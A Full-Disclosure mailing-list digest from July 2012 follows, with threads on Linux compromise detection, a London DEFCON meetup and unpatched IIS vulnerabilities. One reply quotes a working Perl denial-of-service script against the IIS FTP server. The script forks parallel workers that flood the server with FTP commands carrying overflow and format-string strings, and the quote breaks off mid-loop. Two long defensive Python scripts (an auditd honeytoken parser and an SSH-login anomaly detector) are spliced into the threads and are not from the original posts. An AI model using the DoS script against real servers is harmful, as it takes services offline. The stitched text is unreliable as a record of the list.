 Right - if you've compromised the server to the point you can alter
 directory structures/names, then you've already bypassed the ACLs required
 in order to exploit the vulnerability that allows you to bypass the
 ACLs.  I don't get it.

 t

Please forgive him. Is only kingcope. For minute he is go loon and is
this evident as is he not breaking BSD.



Re: [Full-disclosure] Linux - Indicators of compromise

2012-07-16 Thread Григорий Братислава
On Sat, Jul 14, 2012 at 8:46 AM, Ali Varshovi ali.varsh...@hotmail.com wrote:
 Greetings FD,

 Does anyone have any guidelines/useful material on analysing logs of a Linux 
 machine to detect signs of compromise? The data collection piece is not a 
 challenge as a lot of useful information can be captured using commands and 
 some scripts. I'm wondering if there is any systematic approach to analyze 
 the collected logs? Most of the materials I've seen are more aligned to 
 malware and rootkit detection which is not the only concern apparently.

 Thanks,
 Ali

Is in my experience is that I place two folders in directory in is
root folder called /root/MilaKunisLeakedPhotos/ and
/root/OlgaKurlyenko/ is when I see is accessed. Then I know is my
machine compromised. Everyone is want see Olga and Mila



[Full-disclosure] DC4420 - London DEFCON - July meet - Tuesday July 17th 2012

2012-07-16 Thread Major Malfunction
OK, this is the last one before the big one!

Whether you're coming to Vegas or not, you need to be here for this:

Title: Hacking iOS Applications

Synopsis: iOS applications are leet and cool. Let's have some fun with
them!

Pentester Bio: Zsombor Kovacs, Zsombor is a security geek interested in
hacking iOS applications, working for an early adopter of enterprise
iPad applications.

Heh. Maybe he can help me unfsck my iphone... Speaking of which, what do 
you do when you get the dreaded 'error -1' when updating to the latest 
ios (5.1.1) and the apple support nazis say 'you must have tried to hack 
it, tough luck!'? No, really, I didn't try to hack it. Honest. No, 
honest, really. Look, I *know* who I am, but, honest, honest, honest, 
guvner, pretty please I didn't. Your stoopid update broicked it! Dammit!

Anyways, moving on

Venue is here:

The Phoenix
37 Cavendish Square
London
W1G 0PP

http://www.phoenixcavendishsquare.co.uk/

2 minutes walk from Oxford Circus tube.

Talks start at 19:30, kicking out at kicking out time.

See you there!

cheers,
MM
-- 
In DEFCON, we have no names... errr... well, we do... but silly ones...



Re: [Full-disclosure] Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin

2012-07-16 Thread Григорий Братислава
On Mon, Jul 16, 2012 at 2:20 PM, king cope
isowarez.isowarez.isowa...@googlemail.com wrote:
 Don't feed the trolls :D
 btw it's real, it's not my fault you don't understand.
 consult the attachment


MusntLive is no troll. Is question to be asked. If is tree fall on top
of you in if forest, believe you is me, is no matter is you hear it.
MusntLive is work in ultra compartmentislized environment. Attachment
is strip. Is can you please send in emacs format?



Re: [Full-disclosure] Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin

2012-07-16 Thread Григорий Братислава
On Mon, Jul 16, 2012 at 2:50 PM, kaveh ghaemmaghami
kavehghaemmagh...@googlemail.com wrote:
 Hello list
 in my testing environment (IIS 6 with php5 ) the flaw exist . i
 think i got da move to XAMPP MS wont patch it   LOL



Test environment is not production environment. Is place your test
server in your production network and is send me information for to
test.



Re: [Full-disclosure] Linux - Indicators of compromise

2012-07-16 Thread coderman
On Mon, Jul 16, 2012 at 10:59 AM, Григорий Братислава
musntl...@gmail.com wrote:
 ...
 Is in my experience is that I place two folders in directory in is
 root folder called /root/MilaKunisLeakedPhotos/ and
 /root/OlgaKurlyenko/ is when I see is accessed. Then I know is my
 machine compromised. Everyone is want see Olga and Mila

there are honey tokens, and there are *honey* tokens.

Григорий Братислава doing it right!

;P
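What makes the decoy-folder trick a honey token is that nothing legitimate ever reads it, so a single access is a high-confidence indicator. As an added example that is not from either post, the script below turns that into detection logic over auditd records: with a watch such as `auditctl -w /root/decoy -p r -k honeytoken` tagging reads of the decoy, it joins each tagged event's SYSCALL and PATH records and reports who read what. The decoy path, the key and the log lines are constructed for the example.

```python
import re
from collections import defaultdict

# Added example, not from either post. Assumes an auditd watch that tags reads
# of the decoy with key="honeytoken" (verify the watch scope on your kernel; a
# watch on the decoy file itself is the safest form). Log lines are constructed.

KEY_VALUE = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')
EVENT_ID = re.compile(r'msg=audit\((\d+\.\d+):(\d+)\)')

SAMPLE_AUDIT_LOG = """\
type=SYSCALL msg=audit(1342450000.101:201): arch=c000003e syscall=2 success=yes exit=3 a0=7fff1 a1=0 a2=0 a3=0 items=1 ppid=900 pid=901 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts0 ses=3 comm="sshd" exe="/usr/sbin/sshd" key=(null)
type=PATH msg=audit(1342450000.101:201): item=0 name="/etc/ssh/sshd_config" inode=11 dev=08:01 mode=0100644 ouid=0 ogid=0 rdev=00:00
type=SYSCALL msg=audit(1342450042.337:202): arch=c000003e syscall=2 success=yes exit=3 a0=7fff2 a1=0 a2=0 a3=0 items=1 ppid=1200 pid=1201 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts1 ses=4 comm="cat" exe="/bin/cat" key="honeytoken"
type=CWD msg=audit(1342450042.337:202): cwd="/root"
type=PATH msg=audit(1342450042.337:202): item=0 name="/root/decoy/passwords.txt" inode=5150 dev=08:01 mode=0100600 ouid=0 ogid=0 rdev=00:00
type=SYSCALL msg=audit(1342450099.500:203): arch=c000003e syscall=2 success=no exit=-13 a0=7fff3 a1=0 a2=0 a3=0 items=1 ppid=1300 pid=1301 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 comm="sh" exe="/bin/dash" key="honeytoken"
type=PATH msg=audit(1342450099.500:203): item=0 name="/root/decoy/passwords.txt" inode=5150 dev=08:01 mode=0100600 ouid=0 ogid=0 rdev=00:00
"""


def parse_record(line):
    """Split one audit record into a dict of its key=value fields plus _ts and _serial."""
    m = EVENT_ID.search(line)
    if not m:
        return None
    fields = {}
    for k, v in KEY_VALUE.findall(line):
        fields[k] = v[1:-1] if v.startswith('"') else v
    fields["_ts"] = m.group(1)
    fields["_serial"] = m.group(2)
    return fields


def honeytoken_hits(lines, key="honeytoken"):
    """Return [(timestamp, auid, uid, exe, path)] for every event tagged with key.

    Records of one event share a serial; the SYSCALL record carries who and
    how, the PATH record(s) carry what. Failed opens (success=no) count too:
    the attempt is the signal.
    """
    events = defaultdict(list)
    for line in lines:
        rec = parse_record(line)
        if rec:
            events[rec["_serial"]].append(rec)
    hits = []
    for serial in sorted(events, key=int):
        recs = events[serial]
        syscall = next((r for r in recs if r.get("type") == "SYSCALL"), None)
        if not syscall or syscall.get("key") != key:
            continue
        for r in recs:
            if r.get("type") == "PATH" and "name" in r:
                hits.append((syscall["_ts"], syscall.get("auid"), syscall.get("uid"),
                             syscall.get("exe"), r["name"]))
    return hits


def describe(hit):
    """One line per hit. auid 4294967295 is the unset login uid: the process did
    not come from an interactive login (daemon, cron, web server), which is
    worth more attention than an admin's own session."""
    ts, auid, uid, exe, path = hit
    origin = "no login session" if auid == "4294967295" else f"login uid {auid}"
    return f"{ts}: {exe} (uid {uid}, {origin}) read {path}"


if __name__ == "__main__":
    for hit in honeytoken_hits(SAMPLE_AUDIT_LOG.splitlines()):
        print(describe(hit))
```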


Re: [Full-disclosure] Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin

2012-07-16 Thread Григорий Братислава
MusntLive is find your problem:

echo 


 # Exploit Title: Microsoft IIS 6 , 7.5  FTP Server Remote Denial Of
 Service (CPU exhaustion)
 # Date: June 29, 2012
 # Author: coolkaveh
 # coolka...@rocketmail.com
 # https://twitter.com/coolkaveh
 # Vendor Homepage: http://www.microsoft.com
 # Version:  Microsoft IIS 6 , 7.5  FTP Server
 # Tested on: windows server 2008 r2 , seven ,
 #~~~
 #When sending multiple parallel FTP command  requests to a Microsoft
 IIS FTP Server
 #CPU usage goes up to max capacity  and server gets non responsive.
 test it with two core
 #~~~
 # Lame Microsoft IIS FTP Server Remote Denial Of Service
 #~~~


 | sed 's:coo:xXxcoo:g;s:veh:vehxXx:g;s:
::g;s:e:3:g;s:a:@:g;s:i:\!:g;s:u:\\\/:g;s:o:\(\):g'

Is code of yours is not hacker code. MusntLive patch is your code
above. Re-test. Tested under BeOS is confirmed



On Mon, Jul 16, 2012 at 3:18 PM, kaveh ghaemmaghami
kavehghaemmagh...@googlemail.com wrote:
 Hi OK i will  plus they didn't fix
 http://seclists.org/fulldisclosure/2012/Jul/27


 # Exploit Title: Microsoft IIS 6 , 7.5  FTP Server Remote Denial Of
 Service (CPU exhaustion)
 # Date: June 29, 2012
 # Author: coolkaveh
 # coolka...@rocketmail.com
 # https://twitter.com/coolkaveh
 # Vendor Homepage: http://www.microsoft.com
 # Version:  Microsoft IIS 6 , 7.5  FTP Server
 # Tested on: windows server 2008 r2 , seven ,
 #~~~
 #When sending multiple parallel FTP command  requests to a Microsoft
 IIS FTP Server
 #CPU usage goes up to max capacity  and server gets non responsive.
 test it with two core
 #~~~
 # Lame Microsoft IIS FTP Server Remote Denial Of Service
 #~~~
 #!/usr/bin/perl -w
 use IO::Socket;
 use Parallel::ForkManager;
 $|=1;
 sub usage {
 print Please DISABLE firewall daemon of this operating system first!\n;
 print FTP Server Remote Denial Of Service\n;
 print by coolkaveh\n;
 print usage: perl killftp.pl host \n;
 print example: perl killftp.pl www.example.com \n;
 }
 $host=shift;
 $port=shift || 21;
 if(!defined($host)){
 print Please DISABLE firewall daemon of this operating system 
 first!\n;
 print FTP Server Remote Denial Of Service\n;
 print by coolkaveh\n;
 print coolka...@rocketmail.com\n;
 print usage: perl killftp.pl host \n;
 print example: perl killftp.pl www.example.com \n;
 exit(0);
 }
 $check_first=IO::Socket::INET-new(PeerAddr=$host,PeerPort=$port,Timeout=60);
 if(defined $check_first){
 print $host - $port is alive.\n;
 $check_first-close;
 }
 else{
 die($host - $port is closed!\n);
 }
 @junk=('A'x5,'A'x17,'A'x33,'A'x65,'A'x76,'A'x129,'A'x257,'A'x513,'A'x1024,
 '%s%p%x%d','024d','%.2049d','%p%p%p%p','%x%x%x%x','%d%d%d%d','%s%s%s%s','%999s',
 '%08x','%%20d','%%20n','%%20x','%%20s','%s%s%s%s%s%s%s%s%s%s','%p%p%p%p%p%p%p%p%p%p',
 '%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%','%s'x129,'%x'x257,'-1','0','0x100',
 '0x1000','0x3fff','0x7ffe','0x7fff','0x8000','0xfffe','0x','0x1','0x10','1',
 );
 @command=(
 'NLST','CWD','STOR','RETR',
 'MKD','RMD','DELE','RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT','HELP','MODE',
 'APPE','STRU','SITE','SITE INDEX','TYPE','TYPE A','TYPE E','TYPE
 L','TYPE I','NLST','CWD', 'STOR','RETR','MKD',
 'RMD', 'DELE','RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT',
 'HELP','MODE','APPE','STRU','SITE','SITE INDEX',
 'TYPE','TYPE A','TYPE E','TYPE L','TYPE I','NLST','CWD',
 'STOR','RETR','MKD','RMD', 'DELE','RNFR','RNTO','LIST','MDTM',
 'SIZE','STAT','ACCT','HELP','MODE','APPE','STRU','SITE','SITE
 INDEX','TYPE','TYPE A','TYPE E','TYPE L','TYPE I',
 'NLST','CWD','STOR','RETR','MKD','RMD',
 'DELE','RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT','HELP','MODE','APPE',
 'STRU','SITE','SITE INDEX','TYPE','TYPE A','TYPE E','TYPE L','TYPE
 I','NLST','CWD','STOR','RETR','MKD','RMD','DELE',
 'RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT','HELP','MODE','APPE','STRU','SITE','SITE
 INDEX','TYPE','TYPE A','TYPE E',
 'TYPE L','TYPE I','NLST','CWD','STOR','RETR','MKD','RMD',
 'DELE','RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT','HELP',
 'MODE','APPE','STRU','SITE','SITE INDEX','TYPE','TYPE A',
 );
 print Dosing Server!\n;
 $pm = new Parallel::ForkManager(40);
 while (1) {
 my $pid = $pm-start and next;
COMMAND_LIST: foreach $cmd (@command){
 foreach $poc (@junk){
 LABEL5: $sock4=IO::Socket::INET-new(PeerAddr=$host,
 PeerPort=$port, Proto='tcp', Timeout=30);
 if(defined($sock4)){
   

Re: [Full-disclosure] Linux - Indicators of compromise

2012-07-16 Thread Ali Varshovi
Hello everybody and thank you for your useful comments.

Now I'm thinking that we need a comparison base or normal behavior profile to 
be able to detect any deviations or abnormal/suspicious activity. While some 
known patterns of behaviors are useful to detect malware or backdoors we still 
need that normal profile to detect 0-day or APT style intrusions. Isn't that 
the same idea from early days of intrusion detection research (anomaly 
detection approach)? Or maybe I'm off track.

Thoughts?

--Original Message--
To: full-disclosure@lists.grok.org.uk
Subject: Linux - Indicators of compromise
Sent: Jul 14, 2012 8:46 AM

Greetings FD,

Does anyone have any guidelines/useful material on analyzing logs of a Linux 
machine to detect signs of compromise? The data collection piece is not a 
challenge as a lot of useful information can be captured using commands and 
some scripts. I'm wondering if there is any systematic approach to analyze the 
collected logs? Most of the materials I've seen are more aligned to malware and 
rootkit detection which is not the only concern apparently.

Thanks,

Ali
.
-
Sent from my BlackBerry device

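The "normal profile, then flag deviations" idea in Ali's message is easy to try on the logs already being collected. The following is an added example, not code from this thread: it builds a per-account profile (source addresses, authentication methods, login hours) from sshd "Accepted" lines taken from a period believed clean, then reports each later login that falls outside that profile. All log lines are constructed for the demonstration, and the hostnames, accounts and addresses in them are invented.

```python
import re

# Matches the sshd "Accepted" line syslog writes on a successful login; the
# month/day are kept loose, only the hour is used for the profile.
LOGIN_RE = re.compile(
    r"^\w{3} +\d+ (?P<hour>\d\d):\d\d:\d\d \S+ sshd\[\d+\]: "
    r"Accepted (?P<method>\w+) for (?P<user>\S+) from (?P<src>\S+) port \d+"
)

# Constructed auth.log lines from a period believed clean: a deploy account
# that logs in from two internal hosts in the morning, and alice who logs in
# from one host in the late afternoon. The failed root login is not an
# "Accepted" line and does not enter the profile.
BASELINE_LOG = [
    "Jul  9 08:12:41 web1 sshd[1201]: Accepted publickey for deploy from 10.0.5.20 port 51022 ssh2",
    "Jul  9 09:03:10 web1 sshd[1240]: Accepted publickey for deploy from 10.0.5.20 port 51100 ssh2",
    "Jul 10 08:45:02 web1 sshd[1330]: Accepted publickey for deploy from 10.0.5.21 port 49876 ssh2",
    "Jul 10 17:30:55 web1 sshd[1402]: Accepted publickey for alice from 10.0.9.14 port 40021 ssh2",
    "Jul 11 08:20:13 web1 sshd[1510]: Accepted publickey for deploy from 10.0.5.20 port 52310 ssh2",
    "Jul 11 18:02:47 web1 sshd[1588]: Accepted publickey for alice from 10.0.9.14 port 40388 ssh2",
    "Jul 12 09:15:00 web1 sshd[1620]: Accepted publickey for deploy from 10.0.5.21 port 50012 ssh2",
    "Jul 12 14:10:33 web1 sshd[1700]: Failed password for root from 198.51.100.7 port 3344 ssh2",
]

# Constructed lines to check against that profile.
NEW_LOG = [
    "Jul 14 08:46:10 web1 sshd[1801]: Accepted publickey for deploy from 10.0.5.20 port 51500 ssh2",
    "Jul 14 03:12:05 web1 sshd[1822]: Accepted password for deploy from 203.0.113.9 port 61002 ssh2",
    "Jul 14 17:45:30 web1 sshd[1850]: Accepted publickey for alice from 10.0.9.14 port 40500 ssh2",
    "Jul 14 17:50:00 web1 sshd[1860]: Accepted publickey for backup from 10.0.5.20 port 41000 ssh2",
]


def parse_login(line):
    """Return the fields of a successful sshd login, or None for other lines."""
    m = LOGIN_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["hour"] = int(ev["hour"])
    return ev


def build_profile(lines):
    """Per-account baseline: where they come from, how they authenticate,
    at what hours, and how often."""
    profile = {}
    for line in lines:
        ev = parse_login(line)
        if ev is None:
            continue
        p = profile.setdefault(
            ev["user"], {"sources": set(), "methods": set(), "hours": set(), "logins": 0}
        )
        p["sources"].add(ev["src"])
        p["methods"].add(ev["method"])
        p["hours"].add(ev["hour"])
        p["logins"] += 1
    return profile


def deviations(ev, profile, hour_slack=1):
    """List the ways one login departs from the account's baseline; an empty
    list means it looks like every earlier login for that account."""
    p = profile.get(ev["user"])
    if p is None:
        return ["unknown_user"]
    reasons = []
    if ev["src"] not in p["sources"]:
        reasons.append("new_source")
    if ev["method"] not in p["methods"]:
        reasons.append("new_method")
    # Allow logins a little outside the observed hour range before flagging.
    lo, hi = min(p["hours"]) - hour_slack, max(p["hours"]) + hour_slack
    if not lo <= ev["hour"] <= hi:
        reasons.append("odd_hour")
    return reasons


def find_anomalies(lines, profile):
    alerts = []
    for line in lines:
        ev = parse_login(line)
        if ev is None:
            continue
        reasons = deviations(ev, profile)
        if reasons:
            alerts.append({"line": line, "user": ev["user"], "src": ev["src"], "reasons": reasons})
    return alerts


if __name__ == "__main__":
    prof = build_profile(BASELINE_LOG)
    for a in find_anomalies(NEW_LOG, prof):
        print(f"{a['user']} from {a['src']}: {', '.join(a['reasons'])}")
```

The weak point is the same one Ali hints at: the baseline is only as trustworthy as the window it was built from, so it has to come from before any suspected intrusion and be refreshed deliberately rather than by silently absorbing every new login. The hour window also does not wrap around midnight; accounts with overnight activity need a circular range or a per-hour histogram instead.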


Re: [Full-disclosure] Linux - Indicators of compromise

2012-07-16 Thread Benji
So you're talking about making a baseline?

On Mon, Jul 16, 2012 at 7:52 PM, Ali Varshovi ali.varsh...@hotmail.com wrote:
 Hello everybody and thank you for your useful comments.

 Now I'm thinking that we need a comparison base or normal behavior profile to 
 be able to detect any deviations or abnormal/suspicious activity. While some 
 known patterns of behaviors are useful to detect malware or backdoors we 
 still need that normal profile to detect 0-day or APT style intrusions. Isn't 
 that the same idea from early days of intrusion detection research (anomaly 
 detection approach)? Or maybe I'm off track.

 Thoughts?

 --Original Message--
 To: full-disclosure@lists.grok.org.uk
 Subject: Linux - Indicators of compromise
 Sent: Jul 14, 2012 8:46 AM

 Greetings FD,

 Does anyone have any guidelines/useful material on analyzing logs of a Linux 
 machine to detect signs of compromise? The data collection piece is not a 
 challenge as a lot of useful information can be captured using commands and 
 some scripts. I'm wondering if there is any systematic approach to analyze 
 the collected logs? Most of the materials I've seen are more aligned to 
 malware and rootkit detection which is not the only concern apparently.

 Thanks,

 Ali
 .
 -
 Sent from my BlackBerry device



Re: [Full-disclosure] Linux - Indicators of compromise

2012-07-16 Thread coderman
On Mon, Jul 16, 2012 at 11:52 AM, Ali Varshovi ali.varsh...@hotmail.com wrote:
 
 I'm thinking that we need a comparison base or normal behavior profile to be 
 able to detect any deviations or abnormal/suspicious activity. While some 
 known patterns of behaviors are useful to detect malware or backdoors we 
 still need that normal profile to detect 0-day or APT style intrusions. Isn't 
 that the same idea from early days of intrusion detection research (anomaly 
 detection approach)?

yes, also called:

Anomaly Detection
Anomaly-Based Intrusion Detection System
Outlier Detection
Behavior Analysis

and other things i've forgotten...
